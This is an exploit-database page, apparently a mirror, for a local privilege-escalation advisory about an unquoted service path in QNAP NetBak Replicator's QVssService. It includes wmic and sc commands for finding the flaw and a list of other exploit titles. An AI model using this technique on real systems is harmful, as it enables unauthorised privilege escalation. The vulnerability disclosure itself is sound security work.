Search for hundreds of thousands of exploits

"QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path"

Author

Exploit author

"Ivan Marmolejo"

Platform

Exploit platform

windows

Release date

Exploit published date

2019-11-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# Exploit Title: QNAP NetBak Replicator 4.5.6.0607 - 'QVssService' Unquoted Service Path
# Discovery Date: 2019-11-05
# Exploit Author: Ivan Marmolejo
# Vendor Homepage: https://www.qnap.com/en/ 
# Software Link: https://www.qnap.com/en/download
# Version: 4.5.6.0607
# Vulnerability Type: Local
# Tested on: Windows XP Profesional Español SP3

#Exploit
##############################################################################################################################################

Summary:  QNAP NetBak Replicator provides several options for copying files from your Windows computer to your NAS. By simplifying the backup 
process, NetBak Replicator helps ensure that your files are safe even when your computer becomes unavailable.

Description:    The application suffers from an unquoted search path issue impacting the service 'QVssService'. This could potentially allow an 
authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require 
the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could 
potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
of the application.

##############################################################################################################################################

Step to discover the unquoted Service:

 
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """


QNAP Vss Service            QVssService               C:\Archivos de programa\QNAP\NetBak\QVssService.exe 		                 Auto


##############################################################################################################################################

Service info:


C:\Users\user>sc qc QVssService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: QVssService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Archivos de programa\QNAP\NetBak\QVssService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : QNAP Vss Service
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem

##############################################################################################################################################
Release DateTitleTypePlatformAuthor
2020-07-09"FrootVPN 4.8 - 'frootvpn' Unquoted Service Path"localwindowsv3n0m
2020-07-06"Fire Web Server 0.1 - Remote Denial of Service (PoC)"doswindows"Saeed reza Zamanian"
2020-07-01"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-26"KiteService 1.2020.618.0 - Unquoted Service Path"localwindows"Marcos Antonio León"
2020-06-26"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path"localwindows"Ethan Seow"
2020-06-23"Code Blocks 20.03 - Denial Of Service (PoC)"doswindows"Paras Bhatia"
2020-06-23"Lansweeper 7.2 - Incorrect Access Control"localwindows"Amel BOUZIANE-LEBLOND"
2020-06-22"Frigate 2.02 - Denial Of Service (PoC)"doswindows"Paras Bhatia"
2020-06-17"Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-16"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path"localwindowsboku
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47594/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.